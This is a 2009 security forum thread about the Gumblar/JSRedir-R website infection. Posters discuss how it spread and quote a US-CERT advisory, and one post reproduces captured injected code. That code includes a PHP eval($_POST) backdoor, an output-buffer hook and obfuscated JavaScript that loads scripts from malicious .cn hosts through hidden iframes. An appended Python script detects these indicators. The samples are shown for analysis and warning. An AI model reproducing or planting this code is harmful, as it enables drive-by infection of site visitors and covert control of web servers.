
Thread: JSRedir-R

  1. #1
    Senior Member nihil's Avatar
    Join Date
    Jul 2003
    Location
    United Kingdom: Bridlington
    Posts
    17,188

    JSRedir-R

    Nothing terribly special about this website infector other than its phenomenal penetration in a very short space of time:

    http://www.telegraph.co.uk/sciencean...y-experts.html



    More here:

    http://tech.yahoo.com/news/pcworld/2...rgetingmalware
    Last edited by nihil; May 16th, 2009 at 05:04 PM.

  2. #2
    Banned
    Join Date
    Jan 2008
    Posts
    605
    So is it an automated attack on web applications? It sounds like a worm is spreading through SQL injection and remote file inclusion flaws and this script is the payload. But it doesn't give any detail about what web applications are being hit.

    http://www.zone-h.org/mirror/id/8870521

  3. #3
    sigh.. there are still so many servers out there which are infected by automated pieces of code.. amazing..
    Parth Maniar,
    CISSP, CISM, CISA, SSCP

    *Thank you GOD*

    Greater the Difficulty, SWEETER the Victory.

    Believe in yourself.

  4. #4
    AO's Filibustier Cheap Scotch Ron's Avatar
    Join Date
    Nov 2008
    Location
    Swamps of Jersey
    Posts
    378
    But it doesn't give any detail about what web applications are being hit.
    See Nihil's second url/link...

    The attack code has largely gone after PDF and Flash flaws discovered in the last year (such as APSA08-01 and APSB08-11), according to the company's spokesperson. Such attacks typically go after browser plugins installed by software and don't require opening or downloading anything, but these particular assaults can be largely neutered by making sure you have the latest versions of the Adobe software.

    One of the explanatory blog posts from ScanSafe also describes using old MDAC exploits as well, so be sure you're up to date on Microsoft updates also. The PDF attack approach is more bad news for Adobe, whose programs have become a favorite target of late.

    Successful attacks will attempt to install malware that manipulates Google search result pages when viewed by Internet Explorer. Victims may see fake results that will redirect them to fraudulent sites. To spread itself further, the malware will also attempt to steal FTP logins and hijack any Web sites controlled by an infected PC.
    In God We Trust....Everything else we backup.

  5. #5
    Senior Member nihil's Avatar
    Join Date
    Jul 2003
    Location
    United Kingdom: Bridlington
    Posts
    17,188
    Yes,

    US-CERT say this:

    Gumblar Malware Exploit Circulating

    added May 18, 2009 at 12:47 pm
    US-CERT is aware of public reports of a malware exploit circulating. This is a drive-by-download exploit with multiple stages and is being referred to as Gumblar. The first stage of this exploit attempts to compromise legitimate websites by injecting malicious code into them. Reports indicate that these website infections occur primarily through stolen FTP credentials but may also be compromised through poor configuration settings, vulnerable web applications, etc. The second stage of this exploit occurs when users visit a website compromised by Gumblar. Users who visit these compromised websites and have not applied updates for known PDF and Flash Player vulnerabilities may become infected with malware. This malware may be used by attackers to monitor network traffic and obtain sensitive information, including FTP and login credentials, that can be used to conduct further exploits. Additionally, this malware may also redirect Google search results for the infected user.

  6. #6
    Banned
    Join Date
    Jan 2008
    Posts
    605
    See Nihil's second url/link
    That had absolutely nothing to do with what I was talking about.
    The first stage of this exploit attempts to compromise legitimate websites by injecting malicious code into them. Reports indicate that these website infections occur primarily through stolen FTP credentials but may also be compromised through poor configuration settings, vulnerable web applications, etc.
    Again, it could be someone spreading the exploit on XSSable pages that allow javascript to be posted up. Or it could be a full on worm that spreads via remote file inclusion. They give no detailed information at all about this except for the fact that someone sandwiched together exploits for browser extensions.

  7. #7
    Senior Member nihil's Avatar
    Join Date
    Jul 2003
    Location
    United Kingdom: Bridlington
    Posts
    17,188
    This is neither an XSS exploit nor a worm, and although some pundits describe it as a trojan, it isn't one of those either.

    Basically there is a bot that scans the internet looking for vulnerable websites into which it can inject javascript. As no security researcher has yet obtained a copy of this bot, it is unclear what vulnerabilities are being targeted. The speed at which this malware has spread by comparison to its peers would suggest that it uses multiple vulnerabilities.

    The second part is pretty straightforward. You visit a compromised website and pick up a drive-by infection.

    Apparently the latest version of the bot uses heavily obfuscated javascript which makes each site's infection virtually unique.

  8. #8
    Senior Member t34b4g5's Avatar
    Join Date
    Sep 2003
    Location
    Australia.
    Posts
    2,391
    Greetz.

    Here's an example of the script that is being used. Please be careful.

    In other words
    *DO NOT EVEN BOTHER OPENING "hXXp://yourlitetop.cn" IN YOUR BROWSER*

    Code:
    <?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbih0KXtldmFsKHVuZXNjYXBlKCgndmFyJjIwYSYzZCYyMlNjJjcyaXB0RW4mNjcmNjluZSYyMiYyYyY2MiYzZCYyMlZlJjcyc2kmNmZuKCYyOSsmMjImMmNqJjNkJjIyJjIyJjJjdSYzZCY2ZWEmNzYmNjlnYXRvciYyZSY3NXNlckFnZW4mNzQmM2JpJjY2KCYyOHUmMmVpbmQmNjV4T2YmMjgmMjImNTdpbiYyMikmM2UwJjI5JjI2JjI2KHUmMmUmNjluZGUmNzhPZigmMjJOVCYyMDYmMjIpJjNjJjMwKSYyNiYyNiYyOCY2NG8mNjN1JjZkZW50JjJlY29va2llJjJlJjY5biY2NCY2NXhPZigmMjJtaWVrJjNkMSYyMikmM2MmMzApJjI2JjI2KCY3NHlwZW8mNjYoeiY3MnYmN2F0JjczKSYyMSYzZHQmNzkmNzAmNjVvJjY2KCYyMiY0MSYyMiYyOSkpJjdienJ2JjdhJjc0cyYzZCYyMkEmMjImM2JldmFsKCYyMmlmKHdpbiY2NG93JjJlJjIyK2EmMmImMjIpJjZhJjNkaismMjIrYSYyYiYyMk1ham9yJjIyK2ImMmJhJjJiJjIyTWkmNmVvciYyMitiK2EmMmImMjJCdWlsZCYyMismNjImMmImMjImNmEmM2ImMjImMjkmM2JkJjZmY3VtZW4mNzQmMmUmNzcmNzJpdGUmMjgmMjImM2MmNzNjcmlwdCYyMHMmNzJjJjNkJjJmJjJmZ3VtYmxhciYyZWNuJjJmJjcyc3MmMmYmM2ZpZCYzZCYyMismNmErJjIyJjNlJjNjJjVjJjJmc2NyaSY3MHQmM2UmMjIpJjNiJjdkJykucmVwbGFjZSh0LCclJykpKX0pKC8mL2cpOwogLS0+PC9zY3JpcHQ+'));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title><iframe src="http://yourlitetop.cn/ts/in.cgi?mozila9" width=2 height=4 style="visibility: hidden"></iframe>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function 
tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?><?php
    
    ***ORIGINAL PAGE'S CONTENT REMAINED HERE***
    
    echo "<iframe src=\"http://nyoflak15041F8\" width=1 height=1 style=\"visibility:hidden;position
    ]
    and this in a number of .htm files:


    Code:
    <script language=javascript><!-- 
    (function(OFJqv){var Sl3='&#37;';var RLE=('va,72,20a,3d,22Sc,72iptEngi,6ee,22,2cb,3d,22Versio,6e()+,22,2cj,3d,22,22,2cu,3d,6eavig,61t,6f,72,2e,75ser,41g,65nt,3bif((u,2e,69nd,65xOf(,22Ch,72ome,22,29,3c0),26,26(,75,2e,69,6ed,65xOf,28,22W,69n,22,29,3e0,29,26,26(u,2eindexOf,28,22N,54,206,22,29,3c0),26,26(document,2eco,6fkie,2eind,65,78Of,28,22miek,3d1,22),3c0),26,26,28ty,70,65of(,7a,72vzts),21,3dtypeof,28,22A,22,29)),7b,7arvzts,3d,22,41,22,3bev,61,6c,28,22i,66(window,2e,22,2ba+,22),6a,3dj+,22+a+,22Maj,6fr,22,2bb+a+,22Min,6fr,22+b+,61+,22B,75ild,22+,62+,22j,3b,22),3b,64o,63ume,6e,74,2ewrite(,22,3cscr,69,70t,20,73,72c,3d,2f,2fm,22+,22artu,7a,2e,63n,2fv,69d,2f,3fid,3d,22+j,2b,22,3e,3c,5c,2fscri,70t,3e,22,29,3b,7d').replace(OFJqv,Sl3);var lTtZO=unescape(RLE);eval(lTtZO)})(/\,/g);
     --></script><body><iframe src="http://yourlitetop.cn/ts/in.cgi?mozila9" width=2 height=4 style="visibility: hidden"></iframe>
    Last edited by t34b4g5; May 21st, 2009 at 01:11 PM.
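    An added triage script (my own, not code from this thread or any of its posters) that statically reverses the replace(sep, '%') + unescape() step seen in the posted samples instead of eval'ing it, and flags the indicators visible above: the obfuscated eval block, the tiny hidden iframe, and on PHP hosts the output-buffer hook with its eval($_POST[...]) backdoor. The sample page, the PHP fragment and the example.invalid URL are constructed stand-ins, not the real injected code.

```python
"""Static triage for pages carrying the injection pattern shown in this thread:
replace(sep,'%') + unescape() fed to eval(), a hidden iframe, and on PHP hosts
an output-buffer hook guarded by an eval($_POST[...]) backdoor."""
import re
from urllib.parse import unquote

SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.I | re.S)
IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.I)
ENCODED_RE = re.compile(r"\('([^']*)'\)\.replace\(\w+,\s*\w+\)")
SEP_RE = re.compile(r"\(/\\?(.)/g\)")  # separator regex literal, e.g. (/\,/g) or (/&/g)

# Constructed sample page (not the thread's full script): same shape, short payload.
SAMPLE_PAGE = """<html><head><title>t</title></head>
<script language=javascript><!--
(function(k){var S='%';var R=('va,72,20a,3d,22Sc,72iptEngi,6ee,22').replace(k,S);
var L=unescape(R);eval(L)})(/\\,/g);
 --></script><body><iframe src="http://example.invalid/ts/in.cgi?x" width=2 height=4 style="visibility: hidden"></iframe>
</body></html>"""
# Constructed PHP fragment mirroring the hook/backdoor shape from the thread.
SAMPLE_PHP = ("<?php if(isset($_POST['k3']))eval($_POST['k3']);"
              "if(($a=@set_error_handler('k2'))!='k2')$GLOBALS['k']=$a;ob_start('k1'); ?>")

def decode_fragment(encoded: str, sep: str = ",") -> str:
    """Undo replace(sep,'%') + unescape() statically; nothing is executed."""
    return unquote(encoded.replace(sep, "%"))

def decoded_payloads(page: str) -> list:
    """Recover the plaintext of every encoded string in the page's script blocks."""
    out = []
    for body in SCRIPT_RE.findall(page):
        sep_m = SEP_RE.search(body)
        sep = sep_m.group(1) if sep_m else ","
        out.extend(decode_fragment(enc, sep) for enc in ENCODED_RE.findall(body))
    return out

def triage(page: str) -> list:
    """Return the sorted indicator names found in one page's source."""
    hits = set()
    for body in SCRIPT_RE.findall(page):
        if "eval(" in body and "unescape(" in body and ".replace(" in body:
            hits.add("obfuscated_eval")
    for attrs in IFRAME_RE.findall(page):
        w = re.search(r'width=["\']?(\d+)', attrs, re.I)
        h = re.search(r'height=["\']?(\d+)', attrs, re.I)
        tiny = w and h and int(w.group(1)) <= 4 and int(h.group(1)) <= 4
        if tiny or re.search(r"visibility\s*:\s*hidden", attrs, re.I):
            hits.add("hidden_iframe")
    if re.search(r"eval\s*\(\s*\$_(POST|GET|REQUEST)\b", page):
        hits.add("php_eval_backdoor")
    if "ob_start(" in page and "set_error_handler(" in page:
        hits.add("php_output_hook")
    return sorted(hits)
```

    Python's unquote handles the %XX form used here; a variant that emits %uXXXX would need an extra decoding step.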

  9. #9
    Senior Member nihil's Avatar
    Join Date
    Jul 2003
    Location
    United Kingdom: Bridlington
    Posts
    17,188
    Hi t34b4g5,

    Are you sure? That looks more like an Iframe injection than javascript redirection?

    There is an analysis at Unmaskparasites:

    http://blog.unmaskparasites.com/2009...jected-script/

    And:

    http://blog.unmaskparasites.com/2009...mblar-exploit/

    JSRedir-F redirected to Grumblar.cn and more recently to Martuz.cn

    yourlitetop.cn seems to be associated with Win32.Heur, rather than a JS redirect & browser hijack?
    Last edited by nihil; May 22nd, 2009 at 08:13 PM.
